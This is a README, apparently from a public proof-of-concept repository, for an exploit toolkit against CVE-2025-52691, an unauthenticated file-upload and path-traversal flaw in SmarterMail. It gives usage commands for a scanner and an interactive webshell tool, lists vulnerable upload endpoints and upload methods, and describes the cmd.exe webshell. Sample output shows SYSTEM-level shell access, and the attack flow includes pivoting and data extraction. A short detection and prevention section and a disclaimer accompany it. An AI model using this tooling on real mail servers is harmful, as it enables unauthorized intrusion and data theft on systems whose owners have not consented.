Share
## https://sploitus.com/exploit?id=E95F365A-7EC9-5ADF-9D6E-2FBB40BB8039
# CVE-2025-52691 POC
Proof of Concept exploit for CVE-2025-52691 - SmarterMail Unauthenticated Arbitrary File Upload leading to Remote Code Execution.
## โ ๏ธ Disclaimer
This repository is for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse of this software.
## ๐ Overview
CVE-2025-52691 is a critical vulnerability in SmarterMail that allows unauthenticated attackers to upload arbitrary files to the web server through path traversal, leading to Remote Code Execution (RCE).
### Vulnerability Details
- **CVE ID**: CVE-2025-52691
- **Affected Software**: SmarterMail
- **Vulnerability Type**: Arbitrary File Upload / Path Traversal
- **Attack Vector**: Network (Unauthenticated)
- **Impact**: Remote Code Execution (RCE)
- **CVSS Score**: Critical
The vulnerability exists in multiple upload endpoints that fail to properly validate file paths, allowing attackers to use path traversal sequences (`../`) to upload ASPX webshells to the web root directory.
## ๐ ๏ธ Tools Included
### 1. check.py - Vulnerability Scanner
Scans SmarterMail instances to detect if they are vulnerable to CVE-2025-52691.
**Features:**
- Checks multiple upload endpoints
- Non-invasive detection
- Batch scanning from file
- Detailed vulnerability reporting
**Usage:**
```bash
# Check single target
python check.py https://mail.example.com
# Check multiple targets from file
python check.py -f targets.txt
# Save results to file
python check.py -f targets.txt -o results.txt
# Custom timeout
python check.py https://mail.example.com -t 30
```
### 2. pwn.py - Interactive Exploit Tool
Full-featured exploit tool with interactive shell capability.
**Features:**
- Multiple upload methods (Multipart, Raw POST, JSON)
- Automatic shell verification
- Interactive command execution
- Single command execution mode
- Color-coded output
**Usage:**
```bash
# Basic exploitation
python pwn.py https://mail.example.com
# Execute single command
python pwn.py https://mail.example.com -c "whoami"
# Interactive shell mode
python pwn.py https://mail.example.com -i
# Custom timeout
python pwn.py https://mail.example.com -t 30
```
### 3. exploit.py - Library/Module
Core exploitation library that can be imported and used in other scripts.
**Features:**
- Clean class-based architecture
- Multiple upload strategies
- Shell verification
- Command execution
- Easy integration into custom tools
**Usage:**
```python
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
# Configure target
config = TargetConfig(base_url="https://mail.example.com")
# Initialize exploit
exploit = SmarterMailExploit(config)
# Run exploitation
result = exploit.exploit()
if result == ExploitResult.SHELL_UPLOADED:
output = exploit.execute_command("whoami")
print(output)
```
## ๐ฆ Installation
### Prerequisites
- Python 3.7+
- pip
### Setup
```bash
# Clone the repository
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
# Install dependencies
pip install -r requirements.txt
```
### Dependencies
```
requests>=2.28.0
urllib3>=1.26.0
```
## ๐ฏ Attack Flow
1. **Target Identification**: Identify SmarterMail instances
2. **Vulnerability Check**: Use `check.py` to verify vulnerability
3. **Exploitation**: Use `pwn.py` to upload ASPX webshell
4. **Shell Access**: Execute commands via uploaded webshell
5. **Post-Exploitation**: Pivot, escalate privileges, or extract data
## ๐ Technical Details
### Vulnerable Endpoints
- `/api/upload`
- `/api/v1/upload`
- `/Interface/Frmx/UploadFile.aspx`
- `/MRS/Upload.ashx`
- `/Services/Upload.ashx`
### Exploitation Methods
1. **Multipart Form Upload**: Standard file upload with path traversal
2. **Raw POST with Headers**: Direct binary upload with custom headers
3. **JSON Payload**: Base64-encoded file content in JSON
### Webshell Deployment
The exploit uploads a minimal ASPX webshell that:
- Accepts commands via GET parameter `cmd`
- Executes commands using `cmd.exe`
- Returns output wrapped in `` tags
## ๐ก๏ธ Detection & Prevention
### Detection
- Monitor for unusual file uploads to web directories
- Check for ASPX files in unexpected locations
- Review web server logs for suspicious `/api/upload` requests
- Look for path traversal patterns (`../`) in upload requests
### Prevention
- **Update SmarterMail** to the latest patched version
- Implement strict input validation on file upload endpoints
- Use a Web Application Firewall (WAF)
- Restrict file execution permissions in upload directories
- Implement proper authentication on all upload endpoints
## ๐ Example Output
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-52691 Exploit Tool โ
โ SmarterMail Arbitrary File Upload RCE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target: https://mail.example.com
[*] Checking if target is reachable...
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[*] Trying endpoint: /api/upload
[~] Upload attempt successful (Multipart)
[*] Verifying shell access...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx
shell> whoami
nt authority\system
```
## ๐ References
- [CVE Details](#)
- [SmarterMail Official Site](https://www.smartertools.com/smartermail)
- [MITRE CVE-2025-52691](#)
## ๐ License
This project is released for educational and authorized security testing purposes only.
## ๐ฅ Authors
Security Research Team
## ๐ค Contributing
Contributions are welcome! Please ensure all contributions are for legitimate security research purposes.
1. Fork the repository
2. Create your feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add some improvement'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Open a Pull Request
## โญ Acknowledgments
Thanks to the security research community for responsible disclosure practices.
---
**Remember**: Always obtain proper authorization before testing any systems you don't own.